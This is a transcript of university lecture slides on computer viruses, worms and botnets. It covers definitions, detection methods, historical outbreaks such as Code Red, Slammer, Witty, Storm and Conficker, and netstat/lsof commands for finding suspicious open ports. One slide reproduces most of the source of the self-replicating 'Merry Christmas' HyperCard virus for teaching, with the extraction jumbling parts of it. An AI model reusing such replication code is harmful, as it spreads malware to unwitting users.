Transcript No Slide Title
ECE-6612 http://www.csc.gatech.edu/copeland/jac/6612/ Prof. John A. Copeland [email protected]
404 894-5177 fax 404 894-0035 Offices: Klaus 3362 email or call for office visit, 404 894-5177 Chapter 9b - Viruses and Worms 3-2-2015
Computer Viruses (and other
“
Malicious Programs)
Computer “ Viruses ” and related programs have the ability to replicate themselves on an ever increasing number of computers. They originally spread by people sharing floppy disks. Now they spread primarily over the Internet by email, or by sending packets to an open TCP/UDP port (a “ Worm ” ).
Peer-to-peer applications are open doors for worms (Napster, Kaaza, Bit Torrent, eDonkey, ...).
Other “ Malicious Programs ” may be installed by hand on a single machine. They may also be built into widely distributed commercial software packages (Spyware or Ad-ware). These are very hard to detect before the payload activates (Trojan Horses, Trap Doors, and Logic Bombs).
2
Definitions
Virus - code that copies itself into other programs.
A
“
Bacteria
”
replicates until it fills all disk space, or CPU cycles.
Payload - harmful things the malicious program does, after it has had time to spread.
Worm - a program that replicates itself across the network (usually riding on email messages or attached documents (e.g., macro viruses). Email
“
viruses
”
are technically
“
worms
”
.
Trojan Horse - instructions in an otherwise good program that cause bad things to happen (sending your data or password to an attacker over the net).
Logic Bomb - malicious code that activates on an event (e.g., date).
Trap Door (or Back Door) - undocumented entry point written into code for debugging that can allow unwanted users.
“
Vulnerability
”
- a program defect that permits
“
Intrusions
”
.
Easter Egg - extraneous code that does something
“
cool.
”
programmers to show that they control the product.
A way for Bot, BotNet - Large network (hundreds to millions) of compromised computers that communicate to commit DDoS, SPAM, Phish.
3
Taxonomy of Malicious Programs
Need Host Program Independent Trapdoors Logic Bombs Trojan Horses Viruses Bacteria Worms 4
Virus Phases
Dormant - waits for a trigger to start replicating Propagation - copies itself into other programs of the same type on a computer. Spreads when the user shares a file with another computer. Usually searches a file for it ’ s own signature before infecting.
Worms (like Melissa, sobig.a-f, ...) spread as executable attachments to email. Others by sending packets to open TCP or UDP ports.
Triggering - starts delivering payload. Sometimes triggered on a certain date, or after a certain time after infection.
Execution - payload function is done. Perhaps it put a funny message on the screen, or wiped the hard disk clean. It may become start the first phase over again.
5
Virus Protection Have a well-known virus protection program, configured to scan disks and downloads automatically for known viruses.
Use mail servers that screen for viruses and executable files Do not execute programs (or "macro's") from unknown sources (e.g., PS files, Hypercard files, MS Office documents, Java, ...), if you can help it. Configure MS Word and Excel to not automatically execute macros in documents (reset the defaults).
Avoid the most common operating systems and email programs, if possible. Eudora will display HTML without danger (if set to not automatically include links from Web).
6
Types of Viruses
Parasitic Virus
- attaches itself to executable files as part of their code. Runs whenever the host program runs.
Memory-resident Virus
- Lodges in main memory as part of the residual operating system.
Boot Sector Virus
spreads when the operating system boots up (original DOS viruses).
- infects the boot sector of a disk, and
Stealth Virus
- explicitly designed to hide from Virus Scanning programs.
Polymorphic Virus
signature detection.
- mutates with every new host to prevent 7
Macro Viruses
Microsoft Office applications allow selected (e.g., Save File). “ macros ” to be part of the document. The macro could run whenever the document is opened, or when a certain command is A macro virus can delete files, generate email, edit letters, or mail itself to everyone on internal mail address lists.
8
ActiveX Controls
ActiveX Controls are reusable software components that are based on Microsoft Component Object Model (COM). Microsoft later modified the Internet Explorer web browser to use them to incorporate applet-like functionality into Web pages. Because of that later use, ActiveX Controls have since been much derided in the mainstream and technical press for their ability to be used by unethical developers to create computer viruses, trojans and spyware infections.
ActiveX controls are unsafe for users of Internet Explorer (IE) who turn on the browser's ability to download and activate ActiveX controls within a Web page. The problems occur when a user surfs to a non-trusted web page and that web page contains a malicious ActiveX control. This is a very common means of distributing malware such as adware and spyware to unwitting users of Internet Explorer. * Using IE for reading HTML email from unknown sources is risky.
*adapted from Wikipedia 9
Trojan Subcategories Clicker
– Generates Web site traffic, the purpose of which is to generate revenue or other malicious purposes.
Downloader
– Downloads one or more malware components from a remote site and then installs them on the affected system.
Dropper Exploit
– Drops and installs one or more malware components into an affected system.
– Documents or media files containing exploit code.
Fraud Tool
– Malware used to commit fraud. An example of this could include malware that displays fake errors or infection messages, which then incites the user to purchase fake tools or security software.
Generic
– Trojans that do not fall within the other subcategories.
Infostealer
– Spies and/or steals information. Common tools include password stealers, keystroke loggers and spywares.
Proxy
– Allows a remote attacker to relay connection via the affected system in order to hide its real origin.
Rootkit
– Components used by other malware to give itself the capability to hide themselves from the user and security software.
From: http://www-935.ibm.com/services/us/iss/xforce/trendreports/xforce-2008-annual-report-graphics.zip
10
www.us-cert.gov
11
Historical https://www.cert.org/stats/cert_stats.html
2011 - Weekly Reports (e.g., Feb. 14-20, 2011): http://www.us-cert.gov/cas/bulletins/SB11-052.html
12
Virus Detection
1st Generation, Scanners: searched files for any of a library of known virus “ signatures.
” Checked executable files for length changes.
2nd Generation, Heuristic Scanners: looks for more general signs than specific signatures (code segments common to many viruses). Checked files for checksum or hash changes.
3rd Generation, Activity Traps: stay resident in memory and look for certain patterns of software behavior (e.g., scanning files).
4th Generation, Full Featured: combine the best of the techniques above.
13
Firefox to get a "walled garden" for browser extensions, Mozilla to be sole arbiter
by Paul Ducklin on February 17, 2015 Mozilla is the latest vendor, if you will excuse me not referring to it as a foundation or a community, to announce a walled garden for its software ecosystem.
In the second half of 2015, it says, Firefox will require all browser extensions to be digitally signed.
The purpose should be obvious: to make it harder for surreptitious, devious or plain malevolent add-ons to make their way into your browser unnoticed.
Extensions can adapt the behavior of Firefox significantly, from rewriting links and content, through keeping tabs on where you browse, to reading and using your data.
As a result, malicious extensions can be as bad for your digital health as a full-blown malware infection at the operating system level.
https://nakedsecurity.sophos.com/2015/02/17/firefox-to-get-a-walled-garden -for-browser-extensions-mozilla-to-be-sole-arbiter/ 14
Part of the “ Merry Christmas ” Macintosh Hypercard Virus
on openbackground --merryxmas merryxmas "on openbackground --merryxmas" end openbackground
“ merryxmas ” is queued to run whenever 3 “ events ”
on closebackground --merryxmas merryxmas "on closebackground --merryxmas"
occur ”
end closebackground if homescript contains key then set cantmodify of this stack to false if not (cantmodify of this stack) then set the script of this stack to ¬ stackscript & return & lastlines (hostscript,homescript) end if else -- domenu "Quit Hypercard" end if on idle --merryxmas put "on idle --merryxmas" into key if not ( the script of this stack contains key ) then merryxmas key end idle on merryxmas key set lockscreen to true set lockmessages to true set lockrecent to true
The “ “ key to detect if a stack ” infected.
” was used was already
put the userlevel into oldlevel set the userlevel to 5 put the script of this stack into stackscript put the script of stack "Home" into homescript put "on openbackground --merryxmas" into hostscript if stackscript contains key then if homescript contains key then else set cantmodify of stack "Home" to false if not (cantmodify of stack "Home") then set the script of stack "Home" to ¬ homescript & return & lastlines(hostscipt,stackscript) end if end if else set the userlevel to oldlevel set lockrecent to false set lockmessages to false set lockscreen to false end merryxmas
“ lastlines ” copies the virus code into the new stack
function lastlines afterline,stuff put (number of lines in stuff) into total put line (total-53) to total of stuff into host repeat with x = 55 to total put line (total-x+1) of stuff & return & host into host if line 1 of host is afterline then exit repeat end repeat return host end lastlines
The payload was simply to display “ Merry Christmas ” on the screen on Dec. 25, but in practice it made the use of the Hypercard program excruciatingly slow. It would infect (and later check) every Hypercard document ( used and the master script of the “ Home ” that Hypercard ran when started up.
“ stack ” stack ) 15
W32/Swen.A Worm added September 19, 2003 (http://www.cert.org/current/current_activity.html) The CERT/CC has received reports of a new mass-emailing worm, referred to as "W32/Swen.A" or "W32/Gibe.F". This worm is similar to W32/Gibe.B in function. The worm has been reported to propagate through email, network shares, and file-sharing networks such as KaZaA and IRC. It arrives as an attachment. The subject, body, and From: address vary, but often claim to be a Microsoft Internet Explorer Update or a delivery failure notice from qmail. Upon opening the attachment, the worm attempts to mail itself to all e-mail addresses it finds on the system. Additionally, this worm attempts to terminate numerous security product processes on the system.
You may also wish to visit the CERT/CC's computer virus resources page, http://www.us-cert.gov
16
W32/Sobig.F Worm added August 19 | updated 8/25/2003 (http://www.cert.org/current/current_activity.html) The CERT/CC continues to receive reports of an new variant of the Sobig worm, 'W32/Sobig.F'. Like its' predecessors, Sobig.F attempts to replicate itself by sending out infected email. In addition, it can download and execute arbitrary code on the target machine, which potentially permits the worm to compromise confidential information, or set up and run other services, such as open mail relays. Please refer to CERT Incident Note IN-2003-03, "W32/Sobig.F Worm" for more information. The CERT/CC is not aware of any continued activity related to the "second phase" of the worm's operation as described in the Incident Note, but encourages users who are still compromised to take action to recover their systems.
17
Worms Can Spread All Over in Minutes ( “ How to Own the Internet in Your Spare Time, ” Stuart Staniford, Vern Paxton, Nickolas Weaver) 18
Code Red Worm - Feb. 2001
Exploited vulnerability The worm exploited a vulnerability in the indexing software distributed with IIS, described in MS01-033, for which a patch had been available a month earlier.
The worm spread itself using a common type of vulnerability known as a buffer overflow. It did this by using a long string of the repeated character 'N' to overflow a buffer, allowing the worm to execute arbitrary code and infect the machine.
Worm payload * It defaced the affected web site to display: HELLO! Welcome to http://www.worm.com! Hacked By Chinese!
(The last sentence became a stock phrase to indicate an online defeat) * It tried to spread itself by looking for more IIS servers on the Internet.
* It waited 20-27 days after it was installed to launch denial of service attacks on several fixed IP addresses. The IP address of the White House web server was among those.[1] http://en.wikipedia.org/wiki/Code_Red_%28computer_worm%29 19
( “ How to Own the Internet in Your Spare Time, ” Stuart Staniford, Vern Paxton, Nickolas Weaver) 20
The Sapphire Worm Spread by UDP
The Sapphire /Slammer Worm spread by sending a single 404-byte UDP packet (376 data bytes). This meant that no reply was necessary from potential victims and : 1. No pre-scanning of addresses to find valid targets needed.
2. No TCP 3-way handshake needed.
3. Source address could be spoofed, making identification of infected hosts hard.
4. Infected hosts could not be isolated by “ ARP cache poisoning, ” which only blocks replies.
21
from “ The Spread of the Sapphire/Slammer Worm, ” David Moore, Vern Paxton, et. al.
22
Spread of the Sapphire/Slammer Worm (1/25/03) www.caida.org
Each circle represents the log of the number of infected hosts, 30 minutes after the start.
23
The Witty Worm: A New Chapter in Malware
(extracts*) Opinion by Bruce Schneier, Counterpane Internet Security Inc.
JUNE 02, 2004 (COMPUTERWORLD) - Witty was a big deal. It represented some scary malware firsts and is likely a harbinger of worms to come.
Witty was the first worm to
target
a particular set of
security products
-- in this case Internet Security System's (ISS) BlackICE and RealSecure. It infected and destroyed only computers that had particular versions of this software running. [The defect was in
libpcap
, also used by
Wireshark
] 12,000 machines were the entire vulnerable and exposed population, and Witty
infected them all
worldwide --
in 45 minutes
. It's the first worm that quickly corrupted a small population. Previous worms targeting small populations such as Scalper and Slapper were glacially slow.
- Security company eEye Digital Security discovered the vulnerability in ISS's BlackICE/ RealSecure products on March 8, and ISS released a patched version on March 9. EEye published a high-level description of the vulnerability on March 18. On the evening of March 19, about 36 hours after eEye's public disclosure, the Witty worm was released into the wild.
It was less than 700 bytes long. It used a random-number generator to spread itself, avoiding many of the problems that plagued previous worms. It spread by sending itself to random IP addresses with
random destination ports
, a trick that made it easier to sneak through firewalls.
Witty was released through a we've seen a worm do it in the wild. This helped Witty infect every available host in 45 minutes.
*
bot network
of about 100 infected machines. Witty marks the first time http://www.computerworld.com/securitytopics/security/virus/story/0,10801,93584,00.html
24
Spammer's "phishing" Web site BotNet (e.g., Storm, Conflicker) 2007-present) Spammer Infected computers Web Traffic Victim's PCs Virus or Trojan Mail Servers http://en.wikipedia.org/wiki/Storm_botnet 25
Storm Botnet, 2007 - 2008 The botnet named Storm, because it initially spread in email about a storm in Europe, first showed up in 2006. It has gained notoriety through its writers' ability to update and adapt both the malware's code and the spam blasts that lure people to become infected with it. The sparse P2P network mades it difficult to track down the controllers or significantly damage the entire network.
GeoCities sites were infected with malicious JavaScript code that redirects the user's browser to secondary URLs hosted in Turkey. The Turkish URLs, meanwhile, try to persuade the user to download a new codec that's supposedly necessary to view images on the GeoCities sites. According to Trend Micro's analysis, the bogus codec (which claims to be for the 360-degree IPIX format) is actually an identity and information-stealing piece of malware. [PC World; Paul Ferguson, Trend Micro Inc, Nov. 2007] Most threat watchers say no one knows who is behind Storm, but Finnish antivirus maker F-Secure, which takes credit for giving Storm its name, says a group called the Zhelatin Gang is responsible and whom the company believes is operating out of Russia. F-Secure also says that Storm is the largest botnet in the world with just more than 1 million infected PCs. [PC World, Sep. 2007].
In Sept. 2008, Microsoft Corp.'s anti-malware utility, the Malicious Software Removal Tool (MSRT), purged nearly 300,000 infected PCs of the infamous Storm Trojan horse [1].
[1] http://www.computerworld.com/s/article/9120727/Hosting_firm_takedown_bags_500_000_bots?taxonomyId=17&pageNumber=1 26
The McColo Takedown (Nov. 2008) The shutdown of a U.S.-based Web hosting company (McColo) crippled [the bot in] more than 500,000 bot compromised computers ("Rustock" and "Srizbi IPs). ["Srizbi ” controller located in Estonia] ” ). They are no longer able to receive commands from criminals, since McColo hosted the command and control servers (URLs and later revived after the bots found a new McColo was disconnected from the Internet by its upstream service providers at the urging of researchers who believed the company's servers hosted a staggering amount of cyber criminal activity, including the command-and-control servers of some of the planet's biggest botnets. Those collections of infected PCs were responsible for as much as 75% of the spam sent worldwide. When McColo went dark, spam volumes dropped by more than 40% in a matter of hours.
http://www.computerworld.com/s/article/9120727/Hosting_firm_takedown_bags_500_000_bots 27
Conficker (Conflickter, Downadup, Kido) Bot Nov. 2008-2010+ On October 23, 2008, Microsoft announced a security update that resolved a critical vulnerability in the Windows Server service (MS08-067). The CAIDA network telescope observes a significant fraction of the random scans. We [CAIDA] know that the Conficker software generates a set of ~250 new domain name strings per day, which it later contacts using a HTTP request on TCP/80 [looking for a controller]. This feature implies that Conficker is a worm designed to become a botnet commanded by whoever subsequently registers the quasi-randomly generated set of domain names. This feature also gives analysts a mechanism to collect information on worm spread, by registering one or more of these domains and recording HTTP server logs.[1] From late Nov. through Dec. 2008 [SRI] recorded more than 13,000 Conficker infections within their honeynet, and surveyed more than 1.5 million infected IP addresses from 206 countries. Their cumulative census of Conficker.A indicates that it has affected more than 4.7 million IP addresses, while its successor, Conficker.B, has affected 6.7M IP addresses. We [SRI] have not seen such a dominating infection outbreak since Sasser in 2004. Nor have we seen such a broad spectrum of antivirus tools do such a consistently poor job at detecting malware binary variants since the Storm outbreak of 2007.[2] [1] http://www.caida.org/research/security/ms08-067/conficker.xml, [2] http://mtc.sri.com/Conficker/ 28
“ Network Telescope ” operated by U. Calif. San Diego The UCSD Network Telescope consists of a large piece of globally announced IPv4 address space. The telescope IP range contains almost no legitimate hosts, so inbound traffic to nonexistent machines is always anomalous in some way. Because the network telescope contains approximately 1/256th of all IPv4 addresses, it receives roughly one out of every 256 packets sent by an Internet worm with an unbiased random number generator. Because we are uniquely situated to receive traffic from every worm-infected host, we provide a global view of the spread of Internet worms.
http://www.caida.org/ Info on the Witty Worm: http://www.caida.org/research/security/witty/ 29
Confliker TCP port 445 Scanning (to 1/240 of all IP addresses) We [CAIDA] started recording TCP/445 scanning to the UCSD Network Telescope on October 23, 2008, at which point we saw about 1000-2000 unique source IP addresses per hour scanning TCP/445. Before November 21 we saw up to 3222 unique source IP addresses per hour scanning TCP/445. After November 21 midnight UTC we saw a significant increase in source IP addresses that scan on TCP/445, which has remained high ever since. [TCP port 445 is the Windows Server port] http://www.caida.org/research/security/ms08-067/conficker.xml
30
Detecting Open Ports on a UNIX Host
root# netstat -na -A inet (or
“
-f inet
”
) Active Internet connections (including servers) Proto RQ SQ Local Address Foreign Address (state) tcp4 0 0 127.0.0.1.1033 127.0.0.1.735 ESTABLISHED tcp4 0 0 127.0.0.1.735 127.0.0.1.1033 ESTABLISHED tcp4 0 0 *.22 *.* LISTEN tcp4 0 0 *.* *.* CLOSED tcp4 0 0 127.0.0.1.50530 127.0.0.1.631 CLOSE_WAIT tcp4 0 0 127.0.0.1.50529 127.0.0.1.631 CLOSE_WAIT tcp4 0 0 127.0.0.1.631 *.* LISTEN tcp4 0 0 *.* *.* CLOSED tcp4 0 0 127.0.0.1.1033 127.0.0.1.1019 ESTABLISHED tcp4 0 0 127.0.0.1.1019 127.0.0.1.1033 ESTABLISHED tcp4 0 0 127.0.0.1.1033 *.* LISTEN tcp4 0 0 *.27374 *.* LISTEN udp4 0 0 *.* *.* LISTEN
“ netstat -na -A inet (or “ netstat -nao -A inet ” ) will show open ports on a UNIX system. The local address “ 127.0.0.1 is the internal loop back port and is not a problem. Here two ports or open for any (*) outside connections: TCP port 22 (SSH - good) and TCP port 27374 (Sub-7 Trojan Horse - bad). The tcp4 *.* and udp4 *.* indicate promiscuous listening (any IP: any port).
The
“
tcp4 *.*
”
is not good
if you are not knowingly running a sniffer. The “ udp4 *.* ” may just be the OS listening for broadcast messages.
31
“ ifconfig ” can Detect if a Physical Port is Listening to All Packets in Promiscuous (PROMISC) Mode
root# ifconfig en0 en0: flags=8863
ether 00:03:93:80:24:68 media: autoselect (10baseT/UTP
After starting a sniffing program like “ tcpdump ” or a sniffing Trojan Horse:
root# ifconfig en0 en0: flags=8863
ether 00:03:93:80:24:68 media: autoselect (10baseT/UTP
On Windows: in "Command Prompt" try "ipconfig" 32
To detect which program is using a TCP or UDP port:
~ copeland$ netstat -nal | grep tcp4 tcp4 0 0 192.168.1.35.49425 74.125.196.189.443 ESTAB..
tcp4 0 0 192.168.1.35.49443 74.125.196.113.443 ESTAB...
~ copeland$ lsof -i4TCP:443 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME Google 219 copeland 169u IPv4 0x1344daabd83cb55b 0t0 TCP 192.168.1.35:49443->yk-in-f100.1e100.net:https (ESTABLISHED) Google 219 copeland 171u IPv4 0x1344daabd7b9f6fb 0t0 TCP 192.168.1.35:49425->yk-in-f189.1e100.net:https (ESTABLISHED) ~ copeland$ host yk-in-f189.1e100.net yk-in-f189.1e100.net has address 74.125.196.189
~ copeland$ whois 1e100.net (Yahoo) 33